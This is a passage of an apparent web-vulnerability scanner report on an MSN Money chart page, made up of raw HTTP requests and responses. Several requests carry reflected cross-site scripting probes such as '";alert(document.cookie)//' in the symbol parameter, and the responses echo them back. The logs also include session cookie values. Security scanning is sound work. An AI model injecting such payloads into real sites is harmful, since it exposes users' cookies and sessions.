<li class="last noscript"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296400095&amp;rver=5.5.4177.0&amp;wp=MBI&amp;wreply=http://redacted/pploggedin.aspx?Page=http://moneycentral.msn.com/investor/charts/chartdl.aspx&Query=symbol=indu22b72%2522%253balert(document.cookie)%252f%252f2badde9cef5&amp;lc=1033&amp;id=229" target="_top">Sign in</a>
...[SNIP]...
<li class="flyout"><a class="flytrigger" href="https://secure.bundle.com/msn">My Money</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/" target="_top">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm" target="_top">click for restrictions</a>). Real-time quotes provided by <a href="http://batstrading.com/" target="_top">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/" target="_top">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/" target="_top">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/" target="_top">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml" target="_top">Hoover's Inc</a>. Index membership data provided by <a href="http://www.telekurs.com/tkfich_index/tkhoch_home.htm" target="_top">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/" target="_top">Nomura Research Institute Ltd.</a>; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/" target="_top">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_top">Privacy</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn" target="_top">Advertise</a>
...[SNIP]...
<!-- A04:65.54.150.54:01/30/2011 07:08:15 --><img src="http://switch.atdmt.com/action/MSN_enUS_Money" height="1" width="1" border="0" alt="" /><div style="display:none">
...[SNIP]...
<noscript><img src="http://msnportalmoney.112.2O7.net/b/ss/msnportalmoney/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

22.219. http://redacted/investor/charts/chartdl.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /investor/charts/chartdl.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5 HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://investing.money.redacted/investments/charts?Symbol=indu22b72%22%3balert(1)//2badde9cef5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; userCh=4=1&8=0&20=0; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Sun, 30 Jan 2011 17:59:06 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Server: TK2MCWBA01
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Vary: Accept-Encoding
Content-Length: 24731


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><link rel="search" type="application/opensearchdescription+xml" title="Live Search" href="http://www.live.com/live/search/search.xml" /><script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="hotmail" class="flyout noscript">
                   <a href="http://mail.live.com" class="flytrigger unreadcount" target="_top">Hotmail</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=inbox" target="_top">Inbox</a>
...[SNIP]...
<li><a href="http://calendar.live.com" target="_top">Calendar</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=contacts" target="_top">Contacts</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=compose" target="_top">Send e-mail</a>
...[SNIP]...
<li id="messenger"><a href="http://explore.live.com/windows-live-messenger" target="_top">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://bing.com" target="_top">Bing</a>
...[SNIP]...
<li class="first">
                   <a id="hplink" href="http://myhomemsn.com" target="_top">Make MSN your homepage</a>
                   <a id="binglink" href="http://www.bing.com/customizeBrowser">Make Bing your decision engine</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search" target="_top">Web</a>
...[SNIP]...
<li class="last noscript"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296410346&amp;rver=5.5.4177.0&amp;wp=MBI&amp;wreply=http://redacted/pploggedin.aspx?Page=http://moneycentral.msn.com/investor/charts/chartdl.aspx&Query=symbol=indu22b72%2522%253balert(1)%252f%252f2badde9cef5&amp;lc=1033&amp;id=229" target="_top">Sign in</a>
...[SNIP]...
<li class="flyout"><a class="flytrigger" href="https://secure.bundle.com/msn">My Money</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/" target="_top">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm" target="_top">click for restrictions</a>). Real-time quotes provided by <a href="http://batstrading.com/" target="_top">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/" target="_top">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/" target="_top">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/" target="_top">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml" target="_top">Hoover's Inc</a>. Index membership data provided by <a href="http://www.telekurs.com/tkfich_index/tkhoch_home.htm" target="_top">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/" target="_top">Nomura Research Institute Ltd.</a>; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/" target="_top">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_top">Privacy</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn" target="_top">Advertise</a>
...[SNIP]...
<!-- A01:65.54.150.51:01/30/2011 09:59:06 --><img src="http://switch.atdmt.com/action/MSN_enUS_Money" height="1" width="1" border="0" alt="" /><div style="display:none">
...[SNIP]...
<noscript><img src="http://msnportalmoney.112.2O7.net/b/ss/msnportalmoney/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

22.220. http://redacted/investor/charts/chartdl.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /investor/charts/chartdl.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5 HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://investing.money.redacted/investments/charts?Symbol=indu22b72%22%3balert(document.cookie)//2badde9cef5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Sun, 30 Jan 2011 19:52:53 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Vary: Accept-Encoding
Content-Length: 24815


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><link rel="search" type="application/opensearchdescription+xml" title="Live Search" href="http://www.live.com/live/search/search.xml" /><script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="hotmail" class="flyout noscript">
                   <a href="http://mail.live.com" class="flytrigger unreadcount" target="_top">Hotmail</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=inbox" target="_top">Inbox</a>
...[SNIP]...
<li><a href="http://calendar.live.com" target="_top">Calendar</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=contacts" target="_top">Contacts</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=compose" target="_top">Send e-mail</a>
...[SNIP]...
<li id="messenger"><a href="http://explore.live.com/windows-live-messenger" target="_top">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://bing.com" target="_top">Bing</a>
...[SNIP]...
<li class="first">
                   <a id="hplink" href="http://myhomemsn.com" target="_top">Make MSN your homepage</a>
                   <a id="binglink" href="http://www.bing.com/customizeBrowser">Make Bing your decision engine</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search" target="_top">Web</a>
...[SNIP]...
<li class="last noscript"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296417173&amp;rver=5.5.4177.0&amp;wp=MBI&amp;wreply=http://redacted/pploggedin.aspx?Page=http://moneycentral.msn.com/investor/charts/chartdl.aspx&Query=symbol=indu22b72%2522%253balert(document.cookie)%252f%252f2badde9cef5&amp;lc=1033&amp;id=229" target="_top">Sign in</a>
...[SNIP]...
<li class="flyout"><a class="flytrigger" href="https://secure.bundle.com/msn">My Money</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/" target="_top">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm" target="_top">click for restrictions</a>). Real-time quotes provided by <a href="http://batstrading.com/" target="_top">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/" target="_top">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/" target="_top">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/" target="_top">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml" target="_top">Hoover's Inc</a>. Index membership data provided by <a href="http://www.telekurs.com/tkfich_index/tkhoch_home.htm" target="_top">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/" target="_top">Nomura Research Institute Ltd.</a>; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/" target="_top">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_top">Privacy</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn" target="_top">Advertise</a>
...[SNIP]...
<!-- C01:65.54.150.71:01/30/2011 11:52:53 --><img src="http://switch.atdmt.com/action/MSN_enUS_Money" height="1" width="1" border="0" alt="" /><div style="display:none">
...[SNIP]...
<noscript><img src="http://msnportalmoney.112.2O7.net/b/ss/msnportalmoney/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

22.221. http://redacted/investor/charts/chartdl.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /investor/charts/chartdl.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5 HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://investing.money.redacted/investments/charts?Symbol=indu22b72%22%3balert(1)//2badde9cef5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D; userCh=4=1&8=0&20=0

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Sun, 30 Jan 2011 19:53:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Vary: Accept-Encoding
Content-Length: 24731


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><link rel="search" type="application/opensearchdescription+xml" title="Live Search" href="http://www.live.com/live/search/search.xml" /><script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="hotmail" class="flyout noscript">
                   <a href="http://mail.live.com" class="flytrigger unreadcount" target="_top">Hotmail</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=inbox" target="_top">Inbox</a>
...[SNIP]...
<li><a href="http://calendar.live.com" target="_top">Calendar</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=contacts" target="_top">Contacts</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=compose" target="_top">Send e-mail</a>
...[SNIP]...
<li id="messenger"><a href="http://explore.live.com/windows-live-messenger" target="_top">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://bing.com" target="_top">Bing</a>
...[SNIP]...
<li class="first">
                   <a id="hplink" href="http://myhomemsn.com" target="_top">Make MSN your homepage</a>
                   <a id="binglink" href="http://www.bing.com/customizeBrowser">Make Bing your decision engine</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search" target="_top">Web</a>
...[SNIP]...
<li class="last noscript"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296417180&amp;rver=5.5.4177.0&amp;wp=MBI&amp;wreply=http://redacted/pploggedin.aspx?Page=http://moneycentral.msn.com/investor/charts/chartdl.aspx&Query=symbol=indu22b72%2522%253balert(1)%252f%252f2badde9cef5&amp;lc=1033&amp;id=229" target="_top">Sign in</a>
...[SNIP]...
<li class="flyout"><a class="flytrigger" href="https://secure.bundle.com/msn">My Money</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/" target="_top">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm" target="_top">click for restrictions</a>). Real-time quotes provided by <a href="http://batstrading.com/" target="_top">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/" target="_top">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/" target="_top">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/" target="_top">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml" target="_top">Hoover's Inc</a>. Index membership data provided by <a href="http://www.telekurs.com/tkfich_index/tkhoch_home.htm" target="_top">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/" target="_top">Nomura Research Institute Ltd.</a>; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/" target="_top">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_top">Privacy</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn" target="_top">Advertise</a>
...[SNIP]...
<!-- A04:65.54.150.54:01/30/2011 11:53:00 --><img src="http://switch.atdmt.com/action/MSN_enUS_Money" height="1" width="1" border="0" alt="" /><div style="display:none">
...[SNIP]...
<noscript><img src="http://msnportalmoney.112.2O7.net/b/ss/msnportalmoney/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

22.222. http://redacted/investor/charts/chartdl.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /investor/charts/chartdl.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /investor/charts/chartdl.aspx?symbol= HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:13:38 GMT
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Server: TK2MCWBA01
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 24661


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><link rel="search" type="application/opensearchdescription+xml" title="Live Search" href="http://www.live.com/live/search/search.xml" /><script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="hotmail" class="flyout noscript">
                   <a href="http://mail.live.com" class="flytrigger unreadcount" target="_top">Hotmail</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=inbox" target="_top">Inbox</a>
...[SNIP]...
<li><a href="http://calendar.live.com" target="_top">Calendar</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=contacts" target="_top">Contacts</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=compose" target="_top">Send e-mail</a>
...[SNIP]...
<li id="messenger"><a href="http://explore.live.com/windows-live-messenger" target="_top">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://bing.com" target="_top">Bing</a>
...[SNIP]...
<li class="first">
                   <a id="hplink" href="http://myhomemsn.com" target="_top">Make MSN your homepage</a>
                   <a id="binglink" href="http://www.bing.com/customizeBrowser">Make Bing your decision engine</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search" target="_top">Web</a>
...[SNIP]...
<li class="last noscript"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296353618&amp;rver=5.5.4177.0&amp;wp=MBI&amp;wreply=http://redacted/pploggedin.aspx?Page=http://moneycentral.msn.com/investor/charts/chartdl.aspx&Query=symbol=&amp;lc=1033&amp;id=229" target="_top">Sign in</a>
...[SNIP]...
<li class="flyout"><a class="flytrigger" href="https://secure.bundle.com/msn">My Money</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/" target="_top">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm" target="_top">click for restrictions</a>). Real-time quotes provided by <a href="http://batstrading.com/" target="_top">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/" target="_top">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/" target="_top">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/" target="_top">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml" target="_top">Hoover's Inc</a>. Index membership data provided by <a href="http://www.telekurs.com/tkfich_index/tkhoch_home.htm" target="_top">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/" target="_top">Nomura Research Institute Ltd.</a>; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/" target="_top">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_top">Privacy</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn" target="_top">Advertise</a>
...[SNIP]...
<!-- A01:65.54.150.51:01/29/2011 18:13:38 --><img src="http://switch.atdmt.com/action/MSN_enUS_Money" height="1" width="1" border="0" alt="" /><div style="display:none">
...[SNIP]...
<noscript><img src="http://msnportalmoney.112.2O7.net/b/ss/msnportalmoney/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

22.223. http://redacted/investor/charts/chartdl.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /investor/charts/chartdl.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /investor/charts/chartdl.aspx?symbol= HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 18:04:40 GMT
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Server: TK2MCWBA01
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 24661


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...
